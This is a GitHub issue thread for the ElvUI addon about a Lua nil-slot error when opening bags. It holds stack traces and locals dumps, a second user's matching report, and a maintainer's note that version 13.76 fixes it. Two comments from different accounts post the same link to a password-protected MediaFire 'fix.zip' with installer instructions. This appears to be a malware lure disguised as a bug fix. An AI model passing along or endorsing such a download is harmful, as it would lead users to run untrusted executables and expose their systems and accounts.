### ISSUE TITLE
LUA error when togglebag is triggered (Bag doesn't open)

### ISSUE THREAD

**Issue by AndreanoEssobar** [tukui-org/ElvUI#1328]
### Troubleshooting Steps

![2024-08-26 14 18 11 World of Warcraft](https://github.com/user-attachments/assets/dab7e1a6-fdd2-4430-8249-71b22660e58c)

### Describe the expected behavior and what actually happened?

I tried to open my bags by pressing B, then I got a lua error, and the bags won't open.
If I turn the bag changes off so that the only change from ELVUI is the UI, it works normally.
Update: The same issue does not happen on my paladin where the bags are empty.

### Reproducing the issue.

- Enable the ELVUI bag
- Press B 

### Lua Errors

```shell
Message: Interface/AddOns/ElvUI/Core/Modules/Bags/Bags.lua:1256: attempt to index local 'slot' (a nil value)
Time: Mon Aug 26 14:17:27 2024
Count: 4
Stack: Interface/AddOns/ElvUI/Core/Modules/Bags/Bags.lua:1256: attempt to index local 'slot' (a nil value)
[string "@Interface/AddOns/ElvUI/Core/Modules/Bags/Bags.lua"]:1256: in function `Layout'
[string "@Interface/AddOns/ElvUI/Core/Modules/Bags/Bags.lua"]:1382: in function `SetBagAssignments'
[string "@Interface/AddOns/ElvUI/Core/Modules/Bags/Bags.lua"]:482: in function `UpdateAllSlots'
[string "@Interface/AddOns/ElvUI/Core/Modules/Bags/Bags.lua"]:2793: in function `OpenBags'
[string "@Interface/AddOns/ElvUI/Core/Modules/Bags/Bags.lua"]:2718: in function <Interface/AddOns/ElvUI/Core/Modules/Bags/Bags.lua:2704>
[string "=(tail call)"]: ?
[string "=[C]"]: in function `ToggleBag'
[string "@Interface/AddOns/Blizzard_UIPanels_Game/Mainline/ContainerFrame.lua"]:135: in function `ToggleBackpack_Individual'
[string "@Interface/AddOns/Blizzard_UIPanels_Game/Mainline/ContainerFrame.lua"]:147: in function <...s/Blizzard_UIPanels_Game/Mainline/ContainerFrame.lua:139>
[string "=[C]"]: in function `ToggleBackpack'
[string "TOGGLEBACKPACK"]:1: in function <[string "TOGGLEBACKPACK"]:1>

Locals: self = <table> {
 IsEquipmentSlot = <table> {
 }
 BagFrame = ElvUI_ContainerFrame {
 }
 BAG_FILTER_ICONS = <table> {
 }
 QuestSlots = <table> {
 }
 BagIndice = <table> {
 }
 name = "ElvUI_Bags"
 QuestKeys = <table> {
 }
 QuestColors = <table> {
 }
 ItemLevelSlots = <table> {
 }
 defaultModuleState = true
 REAGENTBANK_SIZE = 98
 SortUpdateTimer = Frame {
 }
 SellFrame = ElvUIVendorGraysFrame {
 }
 AutoToggleClose = <table> {
 }
 BankFrame = ElvUI_BankContainerFrame {
 }
 WARBANDBANK_SIZE = 98
 Initialized = true
 BagFrames = <table> {
 }
 ProfessionColors = <table> {
 }
 AssignmentColors = <table> {
 }
 baseName = "ElvUI"
 db = <table> {
 }
 numTrackedTokens = 0
 modules = <table> {
 }
 enabledState = true
 hooks = <table> {
 }
 GearFilters = <table> {
 }
 WarbandBanks = <table> {
 }
 BindText = <table> {
 }
 defaultModuleLibraries = <table> {
 }
 WarbandIndexs = <table> {
 }
 Dropdown = <table> {
 }
 orderedModules = <table> {
 }
 moduleName = "Bags"
 ExcludeVendors = <table> {
 }
 AutoToggleEvents = <table> {
 }
 ExcludeGrays = <table> {
 }
}
isBank = nil
f = ElvUI_ContainerFrame {
 Bags = <table> {
 }
 pickupGold = Button {
 }
 spinnerIcon = ElvUI_ContainerFrameSpinnerIcon {
 }
 TopLeftCorner = Texture {
 }
 RightEdge = Texture {
 }
 bottomOffset = 8
 template = "Transparent"
 firstOpen = true
 ContainerHolderByBagID = <table> {
 }
 totalSlots = 185
 BagIDs = <table> {
 }
 vendorGraysButton = Button {
 }
 currencyButton = Frame {
 }
 closeButton = ElvUI_ContainerFrameCloseButton {
 }
 backdropInfo = <table> {
 }
 bagsButton = ElvUI_ContainerFrameBagsButton {
 }
 PixelSnapDisabled = true
 BottomEdge = Texture {
 }
 DelayedContainers = <table> {
 }
 stackButton = ElvUI_ContainerFrameStackButton {
 }
 holderFrame = Frame {
 }
 ContainerHolder = ElvUI_ContainerFrameContainerHolder {
 }
 TopRightCorner = Texture {
 }
 helpButton = ElvUI_ContainerFrameHelpButton {
 }
 goldText = FontString {
 }
 Center = Texture {
 }
 staleBags = <table> {
 }
 BottomRightCorner = Texture {
 }
 sortButton = ElvUI_ContainerFrameSortButton {
 }
 TopEdge = Texture {
 }
 mover = ElvUIBagMover {
 }
 NewItemGlow = <table> {
 }
 editBox = ElvUI_ContainerFrameEditBox {
 }
 events = <table> {
 }
 BottomLeftCorner = Texture {
 }
 LeftEdge = Texture {
 }
 topOffset = 50
}
lastButton = ElvUI_ContainerFrameBag5Slot36 {
 BottomLeftCorner = Texture {
 }
 IconOverlay = Texture {
 }
 centerText = FontString {
 }
 AugmentBorderAnim = AnimationGroup {
 }
 showMatchHighlight = true
 flashAnim = AnimationGroup {
 }
 RightEdge = Texture {
 }
 NewItemTexture = Texture {
 }
 glossTex = true
 TopEdge = Texture {
 }
 bagFrame = ElvUI_ContainerFrame {
 }
 emptyBackgroundAtlas = "bags-item-slot64"
 Count = ElvUI_ContainerFrameBag5Slot36Count {
 }
 searc
```

### Verification Steps

- [X] I have read the [Changelog](https://github.com/tukui-org/ElvUI/blob/main/CHANGELOG.md) and verified [ElvUI](https://tukui.org/elvui) is up to date by checking **/estatus**
- [X] I have verified my issue doesn't exist in the Default UI or the [Issue Tracker](https://github.com/tukui-org/ElvUI/issues).
- [ ] I have not read any of these steps, please close my issue when you see it.
- [X] I have done the Troubleshooting Steps and included the requested screenshots, which show the issue and status panel.

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Kirri777** [comment]
The same error, after equip `[Dawnweave Reagent Bag]`

```lua
22x ElvUI/Core/Modules/Bags/Bags.lua:1256: attempt to index local 'slot' (a nil value)
[string "@ElvUI/Core/Modules/Bags/Bags.lua"]:1256: in function `Layout'
[string "@ElvUI/Core/Modules/Bags/Bags.lua"]:1382: in function `SetBagAssignments'
[string "@ElvUI/Core/Modules/Bags/Bags.lua"]:1408: in function `UpdateDelayedContainer'
[string "@ElvUI/Core/Modules/Bags/Bags.lua"]:1472: in function <ElvUI/Core/Modules/Bags/Bags.lua:1434>

Locals:
self = <table> {
 IsEquipmentSlot = <table> {
 }
 BagFrame = ElvUI_ContainerFrame {
 }
 BAG_FILTER_ICONS = <table> {
 }
 QuestSlots = <table> {
 }
 BagIndice = <table> {
 }
 name = "ElvUI_Bags"
 QuestKeys = <table> {
 }
 QuestColors = <table> {
 }
 ItemLevelSlots = <table> {
 }
 defaultModuleState = true
 REAGENTBANK_SIZE = 98
 SortUpdateTimer = Frame {
 }
 SellFrame = ElvUIVendorGraysFrame {
 }
 AutoToggleClose = <table> {
 }
 BankFrame = ElvUI_BankContainerFrame {
 }
 WARBANDBANK_SIZE = 98
 Initialized = true
 BagFrames = <table> {
 }
 ProfessionColors = <table> {
 }
 AssignmentColors = <table> {
 }
 baseName = "ElvUI"
 db = <table> {
 }
 numTrackedTokens = 1
 modules = <table> {
 }
 enabledState = true
 hooks = <table> {
 }
 GearFilters = <table> {
 }
 WarbandBanks = <table> {
 }
 BindText = <table> {
 }
 defaultModuleLibraries = <table> {
 }
 WarbandIndexs = <table> {
 }
 Dropdown = <table> {
 }
 orderedModules = <table> {
 }
 moduleName = "Bags"
 ExcludeVendors = <table> {
 }
 AutoToggleEvents = <table> {
 }
 ExcludeGrays = <table> {
 }
}
isBank = nil
f = ElvUI_ContainerFrame {
 Bags = <table> {
 }
 pickupGold = Button {
 }
 spinnerIcon = ElvUI_ContainerFrameSpinnerIcon {
 }
 TopLeftCorner = Texture {
 }
 RightEdge = Texture {
 }
 bottomOffset = 32
 template = "Transparent"
 ContainerHolderByBagID = <table> {
 }
 totalSlots = 197
 BagIDs = <table> {
 }
 vendorGraysButton = Button {
 }
 currencyButton = Frame {
 }
 closeButton = ElvUI_ContainerFrameCloseButton {
 }
 backdropInfo = <table> {
 }
 bagsButton = ElvUI_ContainerFrameBagsButton {
 }
 PixelSnapDisabled = true
 BottomEdge = Texture {
 }
 DelayedContainers = <table> {
 }
 stackButton = ElvUI_ContainerFrameStackButton {
 }
 holderFrame = Frame {
 }
 ContainerHolder = ElvUI_ContainerFrameContainerHolder {
 }
 TopRightCorner = Texture {
 }
 helpButton = ElvUI_ContainerFrameHelpButton {
 }
 goldText = FontString {
 }
 Center = Texture {
 }
 staleBags = <table> {
 }
 BottomRightCorner = Texture {
 }
 sortButton = ElvUI_ContainerFrameSortButton {
 }
 TopEdge = Texture {
 }
 mover = ElvUIBagMover {
 }
 NewItemGlow = <table> {
 }
 editBox = ElvUI_ContainerFrameEditBox {
 }
 events = <table> {
 }
 BottomLeftCorner = Texture {
 }
 LeftEdge = Texture {
 }
 topOffset = 50
}
lastButton = ElvUI_ContainerFrameBag5Slot36 {
 BottomLeftCorner = Texture {
 }
 IconOverlay = Texture {
 }
 centerText = FontString {
 }
 AugmentBorderAnim = AnimationGroup {
 }
 showMatchHighlight = true
 flashAnim = AnimationGroup {
 }
 RightEdge = Texture {
 }
 count = 3
 NewItemTexture = Texture {
 }
 glossTex = true
 TopEdge = Texture {
 }
 bagFrame = ElvUI_ContainerFrame {
 }
 emptyBackgroundAtlas = "bags-item-slot64"
 Count = ElvUI_ContainerFrameBag5Slot36Count {
 }
 searchOverlay = ElvUI_ContainerFrameBag5Slot36SearchOverlay {
 }
 LeftEdge = Texture {
 }
 NormalTexture = ElvUI_ContainerFrameBag5Slot36NormalTexture {
 }
 pushed = Texture {
 }
 isCraftedItem = false
 isProfessionItem = true
 Cooldown = ElvUI_ContainerFrameBag5Slot36Cooldown {
 }
 itemEquipLoc = "INVTYPE_NON_EQUIP_IGNORE"
 BagIndicator = Texture {
 }
 Stock = ElvUI_ContainerFrameBag5Slot36Stock {
 }
 isBound = false
 bindType = FontString {
 }
 IconBorder = Texture {
 }
 icon = ElvUI_ContainerFrameBag5Slot36IconTexture {
 }
 ScrapIcon = Texture {
 }
 questIcon = ElvUI_ContainerFrameBag5Slot36IconQuestTexture {
 }
 newItemGlow = Texture {
 }
 HighlightTexture = Texture {
 }
 PixelSnapDisabled = true
 flash = Texture {
 }
 hasItem = 1
 hover = Texture {
 }
 PushedTexture = Texture {
 }
 forcedBorderColors = <table> {
 }
 itemContextMatchResult = 3
 name = "Exquisite Weavercloth Bolt"
 BottomRightCorner = Texture {
 }
 itemSubClassID = 5
 ProfessionQualityOverlay = Texture {
 }
 junkDesaturate = false
 BattlepayItemTexture = Texture {
 }
 itemLocation = <table> {
 }
 rarity = 3
 locked = false
 AugmentBorderAnimTexture = Texture {
 }
 newitemglowAnim = AnimationGroup {
 }
 itemLink = "|cff0070dd|Hitem:224832::::::::80:70::::4:29:40:30:49:38:1:40:2427:::::|h[Exquisite Weavercloth Bolt |A:Professions-ChatIcon-Quality-Tier1:17:15::1|a]
```

**Comment by kodewdle** [comment]
fixed in 13.76
